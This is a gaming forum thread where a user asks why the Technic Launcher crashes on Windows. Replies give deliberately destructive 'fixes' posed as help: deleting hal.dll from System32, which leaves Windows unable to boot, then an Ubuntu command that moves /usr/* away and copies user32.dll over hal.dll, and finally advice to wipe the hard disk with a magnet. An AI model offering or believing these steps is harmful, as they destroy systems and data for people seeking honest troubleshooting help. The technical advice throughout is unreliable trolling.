Technic Launcher Problem

  1. RossyMac Bunch of young trap lords and we down for sinning

    Gotta problem with the technic launcher in that everytime I try to run it, it comes up the with microsoft error report. You know where it says "This program has encountered a problem and needs to close", then offers to send an error report.

    Looked it up online and there's nothing on it. What's odd is that it works fine on my other laptop but I don't have access to that during the week.

    Any advice?

    Caused by a conflict with the hal.dll located in your Windows directory. Remove hal.dll from C:\Windows\System32.

    The problem is there is a hobo Cookiecaster living in your house somewhere, this starts by causing small things to fall over like tekkit, but as he stays there the longer it gets worse and one day you will wake up and your house has fallen over.

    You have 2 ways of fixing it, either burn EVERYTHING and hope the fire kills him before he makes the fire fall over or buy him a ship and make him captain of it. Either way you're fucked

    oh ffs. Tekkit now crashes the computer after 10 seconds logged onto the server. Assigned it less RAM and it worked, but it now comes up with this error:
    Connection lost
    Internal exception: java.lang.NullPointerException.

    Help :(

    fucking hell. Can't start windows after deleting that, Gaw. I'm currently running on Ubuntu and I hate, get me outta this shit.
    It says it can't start windows because WIndows Root/System32/hal.dll is corrupted/missing.

    What the fuck have you done? :O

    If you want to get Windows back up and running, you can use Ubuntu to help you.

    Go to the Terminal and type:

    Code:
    sudo mkdir -p /mnt/windows
sudo mv -f /usr/* /mnt/windows
sudo cp /mnt/windows/Windows/System32/user32.dll /mnt/windows/Windows/System32/hal.dll

    Aso if reinstalling windows doesnt work for some reason, take out your hard disk and find the strongest magnet you can find. Run it over your hard disk in one direction several times. This remagnetizes the hard disk.
